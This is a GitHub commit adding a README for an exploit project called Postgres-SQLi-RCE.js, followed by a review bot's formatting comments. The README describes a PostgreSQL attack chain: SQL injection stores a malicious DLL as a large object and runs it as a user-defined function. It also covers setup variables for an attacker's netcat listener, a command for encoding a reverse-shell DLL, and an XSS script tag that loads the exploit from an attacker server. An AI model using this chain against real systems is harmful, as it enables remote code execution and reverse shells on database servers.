Commit e18f942

authored Jan 20, 2022
Update README.md
1 parent b6d345c commit e18f942

File tree

1 file changed

+38
-0
lines changed


README.md

Lines changed: 38 additions & 0 deletions
@@ -1,2 +1,40 @@
11
# Postgres-SQLi-RCE.js
22
PostgreSQL Large Objects and UDF (User Defined Functions) RCE exploit re-written in javascript, for easy chaining with XSS
3+
4+
## Methdology
5+
```
6+
Step 1: Create a DLL file that will contain our malicious code
7+
Step 2: Inject a query that creates a large object from an arbitrary remote file on disk
8+
Step 3: Inject a query that updates page 0 of the newly created large object with the first 2KB of our DLL
9+
Step 4: Inject queries that insert additional pages into the pg_largeobject table to contain the remainder of our DLL
10+
Step 5: Inject a query that exports our large object (DLL) onto the remote server file system
11+
Step 6: Inject a query that creates a PostgreSQL User Defined Function (UDF) based on our exported DLL
12+
Step 7: Inject a query that executes our newly created UDF
13+
```
14+
15+
## Requirements <br>
16+
1. **jQuery:** If the target page does not have jQuery included, you can add it from exploit script like [this](https://stackoverflow.com/questions/1140402/how-to-add-jquery-in-js-file/36343307)
17+
2. **Linux/Windows/MAC OSX:** To generate postgres extension
18+
19+
## Setup
20+
Follow this article to generate a database extension for the target machine <br>
21+
https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
22+
23+
Then, set the following variables
24+
```javascript
25+
var nc_ip = "192.168.XXX.XXX"; //Attacker's netcat listener IP
26+
var nc_port = "4444"; //Attacker's netcat listener port
27+
var url= "/vulnerable-path";
28+
29+
var udf="<Add the database extension hex code here >"; //xxd rev_shell.dll | cut -d" " -f 2-9 | sed 's/ //g' | tr -d '\n' > rev_shell.dll.txt
30+
31+
//Reference: https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
32+
```
33+
## Exploitation: XSS Chaining
34+
```javascript
35+
<script src=http://<attacker-server>/postgres_linux_rce.js></script>
36+
```
37+
38+
39+
40+
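Review bot: the Methodology section misspells its heading (`## Methdology`, should be `## Methodology`) and wraps seven lines of prose steps in an untagged code fence; present them as a numbered Markdown list so they wrap and render as text instead of preformatted code. Two more formatting points in the same hunk: the heading `## Requirements <br>` carries a stray HTML line break that should be removed, and the `## Exploitation: XSS Chaining` block is fenced as `javascript` although its only content is an HTML `<script src=...></script>` tag, so that fence should be tagged `html`. On documentation, the Requirements list names only jQuery and a build host; it should also state what the target's database connection must be permitted to do for the large object import/export and `CREATE FUNCTION` steps to succeed, since that is the precondition a defender verifies and a reader needs before following the Setup section.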
